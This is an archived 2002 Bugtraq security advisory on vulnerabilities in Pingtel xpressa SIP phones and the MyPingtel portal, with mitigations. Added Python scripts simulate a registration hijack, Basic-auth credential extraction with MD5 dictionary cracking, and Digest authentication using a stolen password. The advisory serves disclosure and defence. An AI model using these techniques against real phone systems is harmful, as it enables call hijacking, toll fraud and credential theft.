[26755] in bugtraq
More Vulnerabilities with Pingtel xpressa SIP-based IP phones
daemon@ATHENA.MIT.EDU (Ofir Arkin)
Wed Aug 21 12:26:36 2002
From: "Ofir Arkin" <ofir@sys-security.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 20 Aug 2002 22:12:16 +0100
Message-ID: <004d01c2488e$487c3250$0a01a8c0@joshua>
The Sys-Security Group
Security Advisory
"More Vulnerabilities with Pingtel xpressa SIP-based IP Phones"
Release Date: 08/20/2002
Affected Platforms: Pingtel xpressa SIP IP phones model PX-1 with software version 2.0.1 and below; Pingtel instant xpressa softphones with software version 2.0.1 and below
Severity: High
Author: Ofir Arkin (ofir@sys-security.com)
Summary
Pingtel (http://www.pingtel.com) develops intelligent Java-based voice-over-IP phones and softphones for service providers and enterprises.

Using the vulnerabilities enumerated in this advisory it is possible to jeopardize critical telephony infrastructure built on Pingtel's xpressa SIP-based IP phones and softphones. Some of the vulnerabilities allow an attacker to take complete control over an IP phone or softphone node, either directly or by abusing the node's credentials against the other SIP entities on the network.

The most severe issue discussed is how an attacker can exploit vulnerabilities in the MyPingtel Portal (http://my.pingtel.com) to subvert a VoIP infrastructure that includes IP phones and/or softphones from Pingtel.
Full details in PDF format (~500kb):
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with_Pingtel_xpressa_Phones.pdf

Full details in HTML format:
http://www.sys-security.com/archive/advisories/html/More_Vulnerabilities_with_Pingtel_xpressa_Phones.htm

An abridged plain-text version is attached to this e-mail and available from:
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with_Pingtel_xpressa_SIP-based_IP_phones.txt
Ofir Arkin [ofir@sys-security.com]
Founder
The Sys-Security Group
http://www.sys-security.com
PGP CC2C BE53 12C6 C9F2 87B1 B8C6 0DFA CF2D D360 43FA
For more information: http://www.sys-security.com
Copyright (c) The Sys-Security Group 2002, all rights reserved.
[Attachment: More_Vulnerabilities_with_Pingtel_xpressa_SIP-based_IP_phones.txt]
Background Information

Please see the full advisory, available from the Sys-Security Group's web site, for more information on VoIP, SIP and SIP registrars.

A PDF is available from:
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with_Pingtel_xpressa_Phones.pdf

An HTML version is available from:
http://www.sys-security.com/archive/advisories/html/More_Vulnerabilities_with_Pingtel_xpressa_Phones.htm
The Vulnerabilities

A. Predictable Parameter Values with SIP REGISTER requests sent from Pingtel's IP Phones

The following is a SIP REGISTER request sent from a Pingtel SIP-based IP phone to a SIP registrar server:

REGISTER sip:192.168.1.57 SIP/2.0
To: sip:carol@192.168.1.57
From: sip:carol@192.168.1.57;tag=456248
Call-ID: 8-reg@192.168.1.59
CSeq: 1 REGISTER
Contact: sip:carol@192.168.1.59
Expires: 3600
Content-Length: 0
Accept-Language: en
Supported: sip-cc, sip-cc-01, timer
User-Agent: Pingtel/1.2.6 (VxWorks)
Via: SIP/2.0/UDP 192.168.1.59
The values needed to subvert a registration are all predictable. The "Call-ID" is fixed (on other Pingtel IP phones it was always "9-reg@<phone IP>"), the sequence number sent is 1 (so any higher number is sufficient), and the "To" and "From" SIP URIs are predictable too, allowing a remote attacker to pose as the phone towards the SIP registrar and write arbitrary bindings into the location service (if no authentication is required). Note that a registrar following RFC 3261 section 10.3 accepts a REGISTER for an already bound address-of-record with the same Call-ID only if its CSeq is higher than the stored one, so a forged request carrying the phone's Call-ID and a large CSeq not only replaces the binding but also causes the phone's own refreshes, which reuse the same Call-ID with low CSeq values, to be rejected.

Although authentication will be required in some cases, so that the attacker needs the user's correct credentials before being able to pose as the phone and write false records into the location service, there are a number of ways to extract the username and password from a Pingtel SIP-based IP phone, some outlined in this advisory and some in a previous one[1].
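The following toy registrar is an added example, not code from the advisory or from Pingtel. It models the binding-update rule of RFC 3261 section 10.3 and replays the three messages that matter here: the phone's REGISTER exactly as captured above, a forged REGISTER that reuses the predictable To/From/Call-ID with a large CSeq and an attacker-controlled Contact, and the phone's own refresh afterwards. The registrar address 192.168.1.57, user carol and phone address 192.168.1.59 come from the capture; the attacker host 10.66.66.66, the CSeq values and the absence of any authentication are assumptions for the demonstration.

```python
"""Toy SIP registrar (added example, not code from the advisory or from Pingtel).

It models the binding-update rule of RFC 3261 section 10.3: a REGISTER for an
address-of-record that already has a binding with the same Call-ID is accepted
only if its CSeq is higher than the stored one (a different Call-ID is always
accepted as a fresh registration).  With the phone's fixed Call-ID
"8-reg@<phone IP>" and CSeq 1 known, an attacker can replace the binding and,
by choosing a large CSeq, also make the phone's own later refreshes fail.

No authentication is implemented: this is the "no authentication required"
case of section A.  The attacker host and CSeq values are constructed.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

REGISTRAR = "192.168.1.57"    # from the advisory's capture
PHONE_IP = "192.168.1.59"     # from the advisory's capture
ATTACKER_IP = "10.66.66.66"   # hypothetical attacker host


@dataclass
class Binding:
    contact: str
    call_id: str
    cseq: int


def build_register(user: str, contact_ip: str, via_ip: str, call_id: str, cseq: int) -> str:
    """Build a REGISTER in the shape the Pingtel phone sends (section A)."""
    return "\r\n".join([
        f"REGISTER sip:{REGISTRAR} SIP/2.0",
        f"To: sip:{user}@{REGISTRAR}",
        f"From: sip:{user}@{REGISTRAR};tag=456248",
        f"Call-ID: {call_id}",
        f"CSeq: {cseq} REGISTER",
        f"Contact: sip:{user}@{contact_ip}",
        "Expires: 3600",
        "Content-Length: 0",
        f"Via: SIP/2.0/UDP {via_ip}",
        "", "",
    ])


def parse_register(raw: str) -> Dict[str, str]:
    """Return the headers of a REGISTER as a dict keyed by lower-case name."""
    lines = raw.split("\r\n")
    method, _uri, version = lines[0].split(" ")
    if method != "REGISTER" or version != "SIP/2.0":
        raise ValueError("not a SIP/2.0 REGISTER")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if line == "":            # blank line ends the header section
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


class ToyRegistrar:
    def __init__(self) -> None:
        self.location: Dict[str, Binding] = {}   # address-of-record -> binding

    def handle(self, raw: str) -> Tuple[bool, str]:
        h = parse_register(raw)
        aor = h["to"].split(";")[0]               # drop any tag parameter
        contact = h["contact"].split(";")[0]
        call_id = h["call-id"]
        cseq = int(h["cseq"].split()[0])
        current = self.location.get(aor)
        # RFC 3261 10.3 step 7: same Call-ID => CSeq must increase, else abort.
        if current and current.call_id == call_id and cseq <= current.cseq:
            return False, f"rejected: CSeq {cseq} not above stored {current.cseq}"
        self.location[aor] = Binding(contact, call_id, cseq)
        return True, f"bound {aor} -> {contact}"

    def lookup(self, aor: str) -> Optional[str]:
        b = self.location.get(aor)
        return b.contact if b else None


def hijack_scenario() -> Dict[str, object]:
    """Phone registers, attacker forges a REGISTER, phone's refresh is refused."""
    reg = ToyRegistrar()
    aor = f"sip:carol@{REGISTRAR}"
    phone_call_id = f"8-reg@{PHONE_IP}"            # fixed, hence predictable
    results: Dict[str, object] = {}
    # 1. Legitimate registration, exactly as in the advisory's capture.
    results["phone"] = reg.handle(build_register("carol", PHONE_IP, PHONE_IP, phone_call_id, 1))
    # 2. Attacker reuses the predictable To/From/Call-ID, picks a huge CSeq and
    #    points the Contact at a host it controls.
    results["attacker"] = reg.handle(build_register("carol", ATTACKER_IP, ATTACKER_IP, phone_call_id, 65535))
    # 3. The phone's periodic refresh (same Call-ID, CSeq 2) is now refused,
    #    so the hijacked binding persists until it expires.
    results["refresh"] = reg.handle(build_register("carol", PHONE_IP, PHONE_IP, phone_call_id, 2))
    results["binding"] = reg.lookup(aor)
    return results


if __name__ == "__main__":
    for step, outcome in hijack_scenario().items():
        print(f"{step:9}: {outcome}")
```

The point of step 3 is the one a practitioner should take from the predictable Call-ID: the attacker does not merely win a race once, he locks the legitimate phone out of its own address-of-record until the forged binding expires. A registrar that requires Digest authentication on REGISTER closes this regardless of how predictable the headers are, which is why the credential leaks in section B are what make section A dangerous.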
B. Compromising VoIP infrastructure using the MyPingtel Portal

MyPingtel is a portal (http://my.pingtel.com) through which a user manages his Pingtel xpressa softphone or IP phone. According to the MyPingtel web site it can be used to:

"Learn about new applications and services and install them from your PC. Create and manage your speed dial phone book using the PC keyboard. Set your call handling preferences for call forwarding when you're away from the phone and on the phone. Get tips and online help for using your phone. Stay current with news from Pingtel..."

In order to use the portal, a user needs to register his Pingtel xpressa SIP-based IP phone with it. This is done in two stages: the user first registers with Pingtel's portal, and then registers his IP phone (with physical access to it) using the details (and credentials) he supplied when registering with the portal.

The first stage is simply accomplished by browsing to http://my.pingtel.com and filling in the required registration form[2].

The credentials the user supplies to Pingtel's portal during registration must be a valid username and password that allow the registering user to log in to his IP phone via the phone's web server interface.

The next step is to use the MyPingtel Sign-In application, which is supplied by default with Pingtel's IP phone and softphone, to register the IP phone while physically at the phone. This is done by pressing:

More -> MyPingtel Sign-In -> Next -> [Enter your username] ->
[Enter your password] -> OK -> [Enter Admin Password] ->
[Enter Phone Name] -> Next -> OK

A message will be displayed confirming the registration[3].
B.1 E.T. Phones Home - Information Leakage leading to the compromise of the IP Phone

When the IP phone (or softphone) boots up, it sends all of its registration information to Pingtel's MyPingtel Portal (http://my.pingtel.com) over HTTP. The information sent to the portal includes the following:

- Admin name in clear text
- Admin password as an MD5 hash
- MAC address in clear text
- Physical password as an MD5 hash
- Admin domain in clear text
- IP address of the IP phone in clear text
- Web server port in clear text
- And other information

Any malicious party able to extract this information from the wire (upstream to Pingtel, on the phone's local network, on an intermediate network, etc.) can brute force the user's password offline, by hashing candidate passwords with the same algorithm the phone uses and comparing the results against the captured hash. A malicious party might instead brute force the password online, either against the IP phone's web server or through Pingtel's portal.

The value of the information is even greater when the IP address of the IP phone is routable from the Internet. This allows a remote attacker to connect to the IP phone's web server remotely (web server access is required for the operation of the MyPingtel Portal), either directly or through the MyPingtel Portal, using the credentials he extracted.

Although administrator access is needed to tamper with some of the IP phone's features (the username is "admin" and the out-of-the-box password is blank), having any valid username and password would allow a malicious party to tamper with the "Call Handling" features of the IP phone, such as the various "Call Forwarding" features[4].
B.2 E.T. Gets a Call - Information Leakage leading to the compromise of the IP Phone

To use Pingtel's portal one needs to supply his username and password. The web page is composed of two parts: the left part contains a login form which is submitted over HTTP over SSL (HTTPS), while the right part of the page is simply a list of applications and other miscellaneous pieces of information.

B.2.1 Username and password enumeration using the http://my.pingtel.com Web Site

The problems start even before successfully authenticating to the web site, since the web site is kind enough to tell you whether the username exists or not... and, of course, when the password is wrong...

This allows any malicious party to actively enumerate every user ever registered with the MyPingtel Portal, and then his password, since no account lockout policy seems to be in place.

B.2.2 What a successful authentication can bring...

If the authentication to Pingtel's portal is successful, the MyPingtel Portal sends an authentication request to the authenticated user's IP phone's web server with the user's credentials (the same credentials used to log on to the portal). Since the IP phone sent its IP address and web server port number, among other pieces of data, to the portal when the user registered the IP phone with MyPingtel services (and automatically after every boot-up if no changes are made), the portal knows which IP address to send the authentication request to.

The problem is that the Pingtel xpressa SIP-based IP phone's (and softphone's) web server is only able to receive (and handle) HTTP Basic authentication, in which the username and password are merely Base64-encoded, not encrypted. Any malicious party able to extract this request from the wire (downstream from Pingtel, on the phone's local network, on an intermediate network, etc.) obtains the username and password of a legitimate user for that particular IP phone.

The consequences are the same as in B.1: where the IP phone is routable from the Internet a remote attacker can connect to its web server, directly or through the MyPingtel Portal, with the extracted credentials, and even without the "admin" password he can tamper with the phone's "Call Handling" features, such as the various "Call Forwarding" features[5].
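The script below is an added example, not part of the advisory or of any Pingtel code; it shows what an on-path observer does with the two leaks of B.1 and B.2.2 together. The captured HTTP request, the boot-time report, its field names (adminName, adminPwd, ip, webPort) and the word list are all constructed for the example. The advisory says only that the admin password is sent as an "MD5 hash"; treating it as an unsalted MD5 of the password is an assumption made here so the offline attack can be shown.

```python
"""Added example (not from the advisory or Pingtel): recovering credentials from
the two leaks in B.1 and B.2.2 with an on-path capture.

B.2.2: the portal authenticates to the phone's web server with HTTP Basic, so
       the Authorization header is just Base64 of "user:password".
B.1:   at boot the phone reports the admin password as an MD5 hash; an
       unsalted hash can be attacked offline with a word list.

The captured request, the boot report and its field names are constructed for
this example.  That the hash is plain MD5(password) is an assumption; the
advisory says only "MD5 hash".
"""
import base64
import hashlib
from typing import Dict, Iterable, Optional, Tuple
from urllib.parse import parse_qs

# Constructed capture of the portal's request to the phone's web server (B.2.2).
CAPTURED_PORTAL_REQUEST = (
    b"GET /cgi/status HTTP/1.1\r\n"
    b"Host: 192.168.1.59:80\r\n"
    b"Authorization: Basic Y2Fyb2w6czNjcjN0\r\n"
    b"\r\n"
)

# Constructed boot-time report from the phone to the portal (B.1).  The field
# names are made up; the advisory lists the contents, not the wire format.
CAPTURED_BOOT_REPORT = (
    "adminName=admin&adminPwd=5f4dcc3b5aa765d61d8327deb882cf99"
    "&mac=02:00:00:12:34:56&ip=192.168.1.59&webPort=80"
)

# A small constructed word list; a real attacker would use a large one.
WORDLIST = ["pingtel", "admin", "letmein", "password", "xpressa"]


def extract_basic_credentials(raw: bytes) -> Optional[Tuple[str, str]]:
    """Return (user, password) from an HTTP Basic Authorization header, if any."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:           # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization":
            scheme, _, token = value.strip().partition(" ")
            if scheme.lower() != "basic":
                return None
            user, _, password = base64.b64decode(token).decode("latin-1").partition(":")
            return user, password
    return None


def parse_boot_report(body: str) -> Dict[str, str]:
    """Flatten the form-encoded boot report into a dict of single values."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def crack_md5(hex_digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on an unsalted MD5 hash (assumed format)."""
    target = hex_digest.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def harvest(portal_request: bytes, boot_report: str) -> Dict[str, Optional[str]]:
    """Combine both leaks into the credentials an attacker would walk away with."""
    found: Dict[str, Optional[str]] = {}
    creds = extract_basic_credentials(portal_request)
    if creds:
        found["user"], found["user_password"] = creds
    report = parse_boot_report(boot_report)
    found["admin"] = report.get("adminName")
    found["admin_password"] = crack_md5(report["adminPwd"], WORDLIST)
    found["phone"] = f'{report.get("ip")}:{report.get("webPort")}'
    return found


if __name__ == "__main__":
    for k, v in harvest(CAPTURED_PORTAL_REQUEST, CAPTURED_BOOT_REPORT).items():
        print(f"{k:15}: {v}")
```

Note the asymmetry: the Basic credentials need no cracking at all, while the MD5 hash only resists as long as the admin password is not in the attacker's word list, and an empty default password (see the Temporary Solution section) is the first thing any list tries.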
C. Onto the Critical Path

With the Pingtel xpressa SIP-based IP phones and softphones there are a number of situations in which user credentials must be presented, for example:

- When a non-privileged user or the "admin" wishes to use the IP phone's web server to manage some of the IP phone's functionality.
- When outgoing SIP requests have to be authenticated against the targeted SIP entity before that entity is willing to process them.

The Pingtel xpressa SIP-based IP phone can hold two different sets of credentials per user for these scenarios: one set allowing the user to use the IP phone's web server, and another to authenticate the SIP requests the IP phone makes on behalf of that user towards the different SIP entities in the VoIP network.

Unfortunately the documentation for Pingtel's xpressa SIP-based IP phones and softphones does not make the appropriate distinction between the two cases and does not highlight the enormous security hazard involved[6]. Therefore I believe that in several deployments of Pingtel's xpressa SIP-based IP phones the same credentials were set for a user's logon to the IP phone's web server and for the authentication of his outgoing SIP requests.

The credentials used for outgoing SIP requests and for accessing the IP phone's web server will also be the ones provided during registration with the MyPingtel Portal, since a user cannot create another IP phone user without the "admin" password. A user is therefore limited to the login name and password he uses for the IP phone's web server (and, in most cases, for authenticating outgoing SIP requests) when registering with the MyPingtel Portal, as these are what let the portal authenticate to the phone's web server after he has authenticated to the portal.

This leads to the following scenario:

The credentials the Pingtel xpressa SIP-based IP phone presents when it has to authenticate a call request or a registration request to a SIP entity (or entities) within the VoIP network it is part of are the same credentials used for the MyPingtel Portal and the MyPingtel Sign-In application on the IP phone!

A malicious party able to extract the credentials from the MyPingtel Portal, using one of the methods presented in this advisory, can pass any authentication required by any SIP entity for that particular user!

The potential risk is devastating for the VoIP network, where any authentication meant to block misuse of the network can now be easily bypassed:

- Using a user's credentials, an attacker can successfully authenticate to the SIP registrar server and change the binding information stored in the location service for that user. Combined with the ability to predict the SIP REGISTER request parameters sent by Pingtel SIP-based IP phones and softphones, this gives total control over the binding information for that user. Among other things, it allows the attacker to associate the user's SIP or SIPS URI with an IP address or hostname that does not belong to the IP phone; in other words, it allows "call hijacking" in a very easy manner, even remotely!
- Abusing the SIP registrar server would allow an attacker to forward incoming call requests outside of the organization using Pingtel's xpressa SIP-based IP phones whose nodes and credentials were compromised.
- When a user places a call, he might need to provide authentication information in order to be allowed to place it. This is usually performed for the user by his IP phone, where the user's username and password are stored and used when needed. Since the user's credentials are compromised, an attacker can use the extracted credentials to make free phone calls on the VoIP network the Pingtel xpressa SIP-based IP phone(s) belong to.
- Etc.
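To make the shared-credential problem of this section concrete, the following added example (not code from the advisory or from Pingtel) walks through a SIP Digest challenge and response as specified in RFC 3261 section 22 / RFC 2617, computed without qop. The same attacker, holding only the web/portal password recovered as in section B, is tried against two registrars: one where the SIP password is identical to the web password (the situation described above) and one with a separate SIP secret, which is the configuration the Temporary Solution section recommends. The realm voip.example, the nonce, the user carol and both passwords are constructed for the example.

```python
"""Added example (not from the advisory or Pingtel): why the shared credentials
of section C are fatal once they leak.

SIP entities challenge requests with HTTP Digest (RFC 3261 section 22, RFC 2617).
If the phone's SIP password equals the web/portal password, an attacker who
recovered the latter (B.1/B.2) can answer the registrar's challenge and send
an authenticated REGISTER of his own.  The second scenario shows the fix the
advisory recommends: a separate SIP credential set, which the stolen web
password no longer satisfies.

Realm, nonce, users and passwords are constructed; the digest is computed
without qop, the simplest RFC 2617 form.
"""
import hashlib
import re
from typing import Dict, Set

REALM = "voip.example"          # hypothetical registrar realm
REGISTER_URI = "sip:voip.example"


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(user: str, password: str, nonce: str, method: str, uri: str) -> str:
    """RFC 2617 response without qop: MD5(HA1:nonce:HA2)."""
    ha1 = md5hex(f"{user}:{REALM}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def build_authorization(user: str, password: str, nonce: str, method: str, uri: str) -> str:
    """What the client (or an attacker holding the password) sends back."""
    resp = digest_response(user, password, nonce, method, uri)
    return (f'Digest username="{user}", realm="{REALM}", nonce="{nonce}", '
            f'uri="{uri}", response="{resp}", algorithm=MD5')


def parse_digest(header: str) -> Dict[str, str]:
    """Parse the comma-separated Digest parameters into a dict."""
    if not header.startswith("Digest "):
        raise ValueError("not a Digest credential")
    return dict(re.findall(r'(\w+)="?([^",]*)"?', header[len("Digest "):]))


class ToyRegistrarAuth:
    """Registrar side: issue a challenge, then verify the response against its
    own copy of the user's SIP password (which may or may not equal the
    web/portal password)."""

    def __init__(self, sip_passwords: Dict[str, str]) -> None:
        self.sip_passwords = sip_passwords
        self.issued_nonces: Set[str] = set()

    def challenge(self, nonce: str) -> str:
        self.issued_nonces.add(nonce)
        return f'SIP/2.0 401 Unauthorized\r\nWWW-Authenticate: Digest realm="{REALM}", nonce="{nonce}"'

    def verify(self, authorization: str, method: str = "REGISTER") -> bool:
        p = parse_digest(authorization)
        if p.get("realm") != REALM or p.get("nonce") not in self.issued_nonces:
            return False                       # wrong realm or a nonce we never issued
        pw = self.sip_passwords.get(p.get("username", ""))
        if pw is None:
            return False
        expected = digest_response(p["username"], pw, p["nonce"], method, p["uri"])
        return expected == p.get("response")


def scenario() -> Dict[str, bool]:
    """Same attacker, same stolen web password, two registrar configurations."""
    stolen_web_password = "s3cr3t"          # recovered as in B.1 / B.2.2
    nonce = "6f2a9c3e1b"                    # constructed; a real one is random per challenge
    outcomes: Dict[str, bool] = {}
    # Section C: SIP credentials identical to the web/portal credentials.
    shared = ToyRegistrarAuth({"carol": "s3cr3t"})
    shared.challenge(nonce)
    outcomes["shared_credentials"] = shared.verify(
        build_authorization("carol", stolen_web_password, nonce, "REGISTER", REGISTER_URI))
    # Temporary Solution: a separate SIP secret the user never sees.
    separate = ToyRegistrarAuth({"carol": "Zq7!kP0m-sipOnly"})
    separate.challenge(nonce)
    outcomes["separate_credentials"] = separate.verify(
        build_authorization("carol", stolen_web_password, nonce, "REGISTER", REGISTER_URI))
    return outcomes


if __name__ == "__main__":
    print(scenario())
```

Digest authentication itself is not the weak point here: the registrar never sees the password on the wire, and a fresh nonce per challenge prevents replay. What breaks it is that the secret it protects was handed to the MyPingtel Portal and to an HTTP Basic exchange, so separating the SIP credential set from the web credential set is the one configuration change that keeps a web-side leak out of the SIP infrastructure.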
D. More Issues

There are more, less severe issues I have found with Pingtel's xpressa IP phones and softphones; they are listed below so that people understand what they are exposed to.

D.1 Availability - Random Reboots of the IP Phone

Using a Pingtel xpressa SIP-based IP phone I have encountered situations where the IP phone rebooted out of the blue. No attack was launched against the phone, and the network traffic consisted of HTTP, HTTPS, POP3 and SMTP only.

Although the reboots were not frequent, the availability of the IP phone, which is sometimes regarded as critical infrastructure, is still at risk.

I do feel it is not my role to run further tests against the IP phone in order to determine the exact cause of the random reboots. That is something I leave to Pingtel and Wind River (makers of the VxWorks platform).

D.2 No verification of downloaded software

As part of its boot-up process the IP phone fetches several Java applications from Pingtel's web site. The downloaded software is not verified in any way, so anyone able to subvert the DNS records for Pingtel's site can try to "feed" the IP phone a different (malicious?) application.

D.3 User Enumeration by Physically Accessing the IP phone

With physical access to the phone, a malicious party can view the username its owner uses for the IP phone, if the MyPingtel Sign-In application is in use, simply by pressing:

More -> MyPingtel Sign-In

If the MyPingtel Sign-In application is in use, a message will be displayed stating that the IP phone is already signed in to MyPingtel and showing the currently signed-in login name and the server it is connected to.

This information should be hidden.

D.4 Hard coded usernames and passwords within web pages served with MyPingtel Portal

Although the login to the MyPingtel Portal is done securely over HTTPS, the pages served after login embed the user's username and password, as well as the IP phone's IP address, in their source. Any malicious user using a workstation previously used by a legitimate MyPingtel Portal user can, by pressing the browser's back button and viewing the page source, read them in clear text...
Temporary Solution

There are a number of risk-mitigating network and configuration measures a VoIP network administrator can take to reduce some of the risk involved in using Pingtel's xpressa SIP-based IP phones and softphones on his network:

Issues related to the configuration and usage of the IP phones:

- Deploy users using the IP phone's admin GUI in a lab environment BEFORE issuing the IP phones to your users.
- Change the "admin" password on the IP phones. Remember - the default is blank!
- Shut down the Pingtel xpressa IP phone's web server after initial setup if this function is not required or used by your users.
- Configure a different set of credentials for each user for:
  - Outgoing SIP requests that need to be authenticated, and for
  - Web server logon for managing some of the IP phone's abilities.
- Do not disclose the credentials needed to authenticate the outgoing SIP requests to your users!
- Do not perform remote management tasks using the Pingtel xpressa IP phone's web server, since its authentication (HTTP Basic) is effectively in clear text!

Issues related to the MyPingtel Portal:

- Do not allow your users to use the MyPingtel Portal (actively block it with the appropriate access controls on your network filtering devices until the issues in this advisory are resolved); they can access their Pingtel xpressa IP phones directly and locally. Educate them how to do that!
- Do not allow your users to use the MyPingtel Sign-In application on their Pingtel xpressa SIP-based IP phones (actively block it with the appropriate access controls on your network filtering devices until the issues in this advisory are resolved).
- Block access to http://my.pingtel.com

General Issues:

- Block access to your SIP registrar server from the Internet (and from other networks that should not reach it).
- Make your VoIP network non-routable for users coming from the Internet.
- Do not allow any access to your VoIP infrastructure from the Internet.

Other types of solution must be provided by Pingtel.
Conclusion

The MyPingtel Portal does not take security into account, which might lead to the total compromise of any VoIP network using the MyPingtel Portal with Pingtel's SIP-based IP phones and softphones. This is a direct result of the lack of proper security-centric documentation, understanding and education on the part of Pingtel.

This is another example of how a newcomer technology still needs to go through several cycles before it can be regarded as "ok" to use with respect to its security risks.
[1] Ofir Arkin & Joshua Anderson: Multiple Vulnerabilities with Pingtel xpressa SIP Phones, July 12, 2002. Available from:
http://www.sys-security.com/archive/advisories/a071202-1.txt

[2] Although I have previously indicated to Pingtel that the information entered is not validated against any record of sale or otherwise, it is still possible for anyone to register with completely fake information and receive the services of the portal.

[3] When entering the password for the MyPingtel user, the last digit stays displayed indefinitely on the instant xpressa softphones, making shoulder surfing even easier than ever before.

[4] Please see section C for more hazards.

[5] Please see section C for more hazards.

[6] Pingtel's own "Best Practices for Deploying Pingtel phones" document (http://www.pingtel.com/docs/best_practices_20x.txt) does not address this issue.